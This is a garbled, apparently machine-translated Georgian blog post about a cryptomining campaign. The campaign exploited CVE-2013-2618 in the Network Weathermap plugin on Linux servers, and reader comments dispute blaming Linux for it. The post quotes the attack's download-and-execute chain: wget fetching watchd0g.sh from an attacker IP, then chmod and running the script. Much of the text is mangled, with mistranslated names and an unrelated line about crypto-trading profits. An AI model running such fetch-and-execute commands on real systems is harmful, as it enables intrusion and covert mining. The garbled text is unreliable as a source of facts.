Linux- ის 5 წლიანი ხარვეზი თავდამსხმელებს საშუალებას აძლევს, დანაღმულიყვნენ კრიპტოვალუტები

linux- ის ავარია

ეს ეხლა კრიპტოვალუტის მეშახტე დისტანციური კომპიუტერების გამოყენებით ავტორიზაციის გარეშე ამ მფლობელების ტენდენცია ხდება. ამ თემაზე რამდენჯერმე უკვე ვისაუბრე აქ, ბლოგზე, ამ ტიპის სიტუაციის შესახებ.

ეს არის ის, რომ ამან უკვე მთლიანად გათიშა კონტროლი კრიპტოვალუტების მომენტიდან საკმაოდ მნიშვნელოვანი ადგილი და ღირებულება დაიკავა, ადამიანებმა, რომლებსაც აქვთ საკმარისი ცოდნა კომპიუტერზე წვდომისთვის, რომელიც არღვევს მათ უსაფრთხოებას, დრო გაათავისუფლეს ფულის სარგებელის მისაღებად მნიშვნელოვანი ინფორმაციის ან საბანკო ანგარიშების ძიებაში.

ამის ნაცვლად, ისინი ირჩევენ უმარტივეს საქმეს ამ გუნდების კონტროლის აღებაში და მათ სამთო ქსელში გაერთიანებაში და ასევე სხვა დავალებებზე, რომლებიც ჩვეულებრივ აკეთებენ ბოტნეტს.

ამ გზით, ჩვეულებრივ, უფრო მეტია თქვენი ნომრის დათვლა, ისინი მხოლოდ აქცენტს აკეთებენ მომენტალურ ფულზე.

ბაზრის ტენდენციების ჭკვიანური გაგებით და კრიპტო ვაჭრობის შესახებ სათანადო ცოდნით, შეიძლება დიდი სარგებელი მოვიტანოთ.

Linux ნამდვილად უსაფრთხო სისტემაა?

ბევრ ჩვენგანს აქვს იდეა, რომ Linux არის თითქმის სრულყოფილი უსაფრთხო ოპერაციული სისტემა, სინამდვილეში ის არის, რომ მას ჯერ კიდევ აქვს გარკვეული ხარვეზები.

კარგად აქვსრამდენიმე დღის განმავლობაში TrendMicro– მ იპოვა, რომელშიც გამოავლინა ახალი Linux სისტემებში არსებული ხარვეზი, რამაც ჰაკერებს კრიპტოვალუტის მოპოვების უპირატესობა მიანიჭა Linux სერვერებისა და მანქანების გამოყენებით.

თქვენი ბლოგის განცხადებით მათ კომენტარი გააკეთეს შემდეგზე:

ინციდენტის რეაგირებასთან დაკავშირებული ჩვენი მონიტორინგის საშუალებით, ჩვენ დავაკვირდით შეჭრის მცდელობებს, რომელთა ინდიკატორებიც შეგვეძლო კავშირი შეგვექმნა კრიპტოვალუტის მოპოვების წინა კამპანიასთან, რომელშიც გამოყენებული იყო JenkinsMiner მავნე პროგრამა.

განსხვავება: ეს კამპანია მიზნად ისახავს Linux სერვერებს. ეს ასევე არის კლასიკური შემთხვევა ხელახლა გამოყენებული სისუსტეებისგან, უსაფრთხოების მოძველებული ხარვეზის გამოყენებით, რომლის პატჩი უკვე ხელმისაწვდომია თითქმის ხუთი წლის განმავლობაში.

ამ გამოცემაში თქვენი ანალიზის საშუალებით მოახერხა დაზარალებული საიტების იდენტიფიცირება ამ წარუმატებლობისთვის რომ ეს ძირითადად აისახება იაპონიაში, ტაივანში, ჩინეთში, აშშ-სა და ინდოეთში.

თავდასხმის ანალიზი

ანალიზის საშუალებით Trend Micro Smart დაცვის ქსელის მიერ ოდნავ დაწვრილებითი ინფორმაცია იმის შესახებ, თუ როგორ ისარგებლებენ თავდამსხმელები ამ ხარვეზით:

ამ კამპანიის ოპერატორები იყენებდნენ CVE-2013-2618- ს, Camapi Network Weathermap მოდულში დათარიღებულ დაუცველობას, რომელსაც სისტემის ადმინისტრატორები იყენებენ ქსელის აქტივობის ვიზუალიზაციისთვის.

რაც შეეხება იმას, თუ რატომ იყენებენ ისინი უსაფრთხოების ძველ ხარვეზს: ქსელის ამინდს ჯერჯერობით მხოლოდ ორი დაუცველი აქვს საჯაროდ, ორივე 2014 წლის ივნისიდან.

ამ თავდამსხმელებმა შეიძლება ისარგებლონ არა მხოლოდ უსაფრთხოების ხარვეზით, რომლისთვისაც ექსპლოიტი არის შესაძლებელი, არამედ პაჩის შეფერხებით, რაც ხდება ორგანიზაციებში ღია კოდის საშუალებით.

ძირითადად შეტევა ხდება XSS შეტევის საშუალებით:

ამინდის რუკა-კრიპტომინერი -4

ბუნდოვანი ნაწილია შეტევის სამიზნე, ვებ სერვერი პორტით.

ფაილი /plugins/weathermap/configs/conn.php არის XSS– ზე მუდმივი შეტევის შედეგი / plugins / weathermap / php .

Plus conn.php თავდაპირველად, ვხედავთ, მსგავსი HTTP მოთხოვნა გამოიყენება გვერდზე, სახელწოდებით " მაგარია. php ".

კრიპტოვალუტის მოპოვების პროგრამა ნაწილდება დაუცველობით PHP ამინდის რუკიდან Linux სერვერები

სურათზე ხედავთ როგორ ხდება შეტევა და ის აღწერილია შემდეგნაირად:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

რას აკეთებს, გაგზავნის მითითებას wget- ით ფაილის ჩამოსატვირთად, რომელიც არის პროგრამა, რომელიც ნაგულისხმევად დაინსტალირებულია Linux– ის თითქმის ყველა დისტრიბუციაში.

chmod 775 watchd0g.sh

ფაილს ასრულებს

./watchd0g.sh

საბოლოო ჯამში, ეს არის ფაილის სერვერზე გაშვება.

საბედნიეროდ, უკვე არის პატჩი ( CVE-2013-2618 ) შესაძლებელია წარუმატებლობისთვის და შეგიძლიათ გადმოწეროთ საწყისი ამ ბმულზე.

Si გინდა მეტი იცოდე ამის შესახებ ამ წარუმატებლობის შეგიძლიათ ეწვიოთ ამ ბმულს.

წყარო: Cryptocurrency Miner ნაწილდება PHP– ის მეშვეობით, ამინდის რუქის დაუცველობით, მიზნად ისახავს Linux სერვერებს


სტატიის შინაარსი იცავს ჩვენს პრინციპებს სარედაქციო ეთიკა. შეცდომის შესატყობინებლად დააჭირეთ ღილაკს აქ.

5 კომენტარი დატოვე შენი

დატოვე კომენტარი

თქვენი ელფოსტის მისამართი გამოქვეყნებული არ იყო. აუცილებელი ველები აღნიშნულია *

*

*

  1. მონაცემებზე პასუხისმგებელი: მიგელ ანგელ გატონი
  2. მონაცემთა მიზანი: სპამის კონტროლი, კომენტარების მართვა.
  3. ლეგიტიმაცია: თქვენი თანხმობა
  4. მონაცემთა კომუნიკაცია: მონაცემები არ გადაეცემა მესამე პირებს, გარდა სამართლებრივი ვალდებულებისა.
  5. მონაცემთა შენახვა: მონაცემთა ბაზა, რომელსაც უმასპინძლა Occentus Networks (EU)
  6. უფლებები: ნებისმიერ დროს შეგიძლიათ შეზღუდოთ, აღადგინოთ და წაშალოთ თქვენი ინფორმაცია.

  1.   მიგელ მაიოლი ი თურ დიჯო

    იდიოტი არ არის უსაფრთხო და ამის მიუხედავად Linux გიშველის.
    უსაფრთხოების პატჩების განახლება არ არის Linux- ის ბრალი. იმის ბრალია, რომ ზოგიერთმა კომპანიამ, ფულის დაზოგვის მიზნით, იდიოტები აიყვანა სისტემის ადმინისტრატორად,
    ასეც რომ იყოს, ის დაუყოვნებლივ აღმოაჩინეს და დაუყოვნებლივ მოგვარდება, უსაფრთხოების მსგავსი მცირე ინციდენტიც კი ქვეყნდება.

  2.   მე მინდა ისეთი ვილა, როგორიცაა ელდეკოლეტასი დიჯო

    და რა ბრალია Linux- ს, რომ მისი განახლებები არ გამოიყენება? GNU / Linux დეველოპერები ასრულებენ თავიანთ საქმეს განვითარებადი მოწყვლადობის პრობლემების მოგვარების გზით და მომხმარებლებისთვის ხელმისაწვდომი გახადონ. თუ ექიმი გრიპის საწინააღმდეგო ვაქცინას გამოგიწერთ და არ გაუკეთებთ მას, ავად გახდებით და გახშირდით ... ექიმის ბრალია?

  3.   Bill დიჯო

    მას შემდეგ, რაც Linux არ არის ის, რაც იყო, ზედიზედ ორი სიახლეა ორი ძირითადი შეცდომით:
    1.- უკეთეს რედაქტორებს რომ შექმნან, ისინი აყენებენ ისეთ პროგრამას, რომელიც არ არის თავისუფალი პროგრამა და მათ ავიწყდებათ სხვებიც (ისინი მოყვანილია კომენტარებში).
    2.- უზარმაზარი სიახლე ვირუსების შესახებ, როდესაც ისინი მხოლოდ NON UPDATED სერვერებზე მოქმედებენ. მაგრამ თუ რომელიმე linux სტანდარტულად განახლდა ათწლეულების განმავლობაში. შიშის დაყენება ისე, თითქოს Windows- ის ტიპის წამლის საწინააღმდეგო ვირუსი იყო საჭირო. როგორც ჩანს, ისინი ცდილობენ თქვან, რომ Linux არის იგივე Windows და არა.
    თუ შეცდომა ძველია და უკვე გაასწორეს, ეს არც სიახლეა და არც არაფერი. არ ითამაშოთ Microsoft და ანტივირუსული კომპანიები, როგორიცაა Trend Micro, Norton, Panda ან McAffee, ან მიიღოთ ანაზღაურება.
    სხვათა შორის, ჩვენ Trend Micro- ს რამდენიმე წლის განმავლობაში ვიყენებდით კომპანიაში და ეს იყო ნამდვილი კარტოფილი, არეულობა, რადგან მის სისტემაში ნათქვამია, რომ შემსრულებელს აქვს ვირუსის "კვალი" (რაც შეიძლება ვირუსი იყოს, თუნდაც ეს იყოს არა) და რატომ ამოიღო იგი (იგი მიიყვანა დირექტორიაში, რომ არ გაეშვა) არ დაუშვა მისი გამოყენება, და მას არ ჰქონდა არც ერთი თეთრი სია ამ საქციელის განბლოკვისთვის უსაფრთხო შემსრულებელი ფაილით, რომლის გამოყენებაც გვჭირდებოდა. წადი ეს იყო კორპორატიული ვერსია, ინდივიდუალურ ვერსიას ჰქონდა თეთრების სიაში შეყვანის ეს შესაძლებლობა. Პათეტიკური.

  4.   Bill დიჯო

    ნუ აღწერ საკუთარ თავს ასე ელეგანტურად.
    სტატიაში საუბარია უსაფრთხოების ხვრელზე, რომელიც საშუალებას გაძლევთ შეიტანოთ პროგრამა, გახადოთ მისი შესრულებადი და გაუშვათ, ეს არის უსაფრთხოების ხვრელი, რომლის გავრცელებასაც საჭიროებს ყველა ვირუსი. ქსელში კომპიუტერების სკანირების შესაძლებლობა ოპერაციის გამეორებისა და თვითკოპირებისთვის. ისინი ამას ზუსტად არ აკეთებენ, რადგან Linux– ში აღმოჩენილი უსაფრთხოების ხვრელები დაფარულია უსაფრთხოების პატჩით და სწორედ ამას ვგულისხმობ Windows– სა და Linux– ს შორის სხვაობას, ვინაიდან ანტივირუსი არ არის საჭირო, არამედ ხვრელის დასაფარავად. Windows- ში ეს უფრო რთულია რამდენიმე მიზეზის გამო: 1.- ფაილების შესრულება შეიძლება გახდეს მათი გაფართოებით, დაზარალებულ კომპიუტერში მათი დანერგვის საფეხურის აღმოფხვრა. 2.- მომხმარებლები მუდმივად აყენებენ საეჭვო წარმოშობის პროგრამებს, რადგან ისინი საკუთრებაში არიან და მათ სჭირდებათ ფულის გადახდის გარეშე (მე არაფერს ვამბობ, რას ნიშნავს საშინაო ეკონომიკისთვის MS Office- ის, Photoshop- ის ყიდვა ... კომპიუტერული ტექნიკის ღირებულება). 3.- ადრე თუ გვიან Windows იფუჭებს, მომხმარებელი მიჰყავს მეზობელთან, მეგობართან, ... ვინც დრო არ დაკარგავს, აფორმებს ყველაფერს და აყენებს საბოლოო Windows- ს აქტივაციის პატჩით, რომელიც არ არის განახლებული ან პატჩი თავად აყენებს ჯაშუშურ პროგრამას. შეიძლება ეს ასე არ იყოს და შესანიშნავია, მაგრამ ეს შეიძლება იყოს და Windows- მა გამოიყენოს პაროლების ჯაშუში. სტატიაში ისინი ახსენებენ დაუცველობას დაზარალებულ linux- ში, რის გამოც პროგრამა, რომელიც ავტომატურად დაასკანირებს ქსელს და იყენებს მას საკუთარი თავის კოპირებისთვის და სერვერზე გასაშვებად, ყველაზე ადვილია, ამ მიზეზით კომენტარი გაკეთებულია სტატიაში ნებისმიერი ვირუსისთვის ყველაზე მნიშვნელოვანი ნაბიჯია: სისტემის დაუცველობის ცოდნა შეტევაზე.

  5.   ჰამბაგლიო დიჯო

    ცუდი ინფორმაცია. ეს არ არის შეცდომა Linux- ში, ეს არის შეცდომა PHP APPLICATION- ში, ეს არის cross-platform. ეს არ არის მხოლოდ ის სისტემები, რომლებიც მუშაობენ linux ბირთვით! მაშინაც კი, თუ პროგრამა არ იყო cross-platform, ეს არ იქნებოდა Linux შეცდომა, ის იქნებოდა მხოლოდ პროგრამა.

    Linux ბირთვს არ აქვს მცირედი ჩარევა, როგორიცაა ამ ერთიანი, სკრიფტინგის გადაკვეთისგან დაცვა. მინიმუმ გამოიძიეთ ხუთი წუთი გამოქვეყნებამდე, რადგან სიმართლე ისაა, რომ ყველასთვის, ვინც რამის შესახებ ცოტა რამ იცის, თქვენ ცუდად გამოიყურებით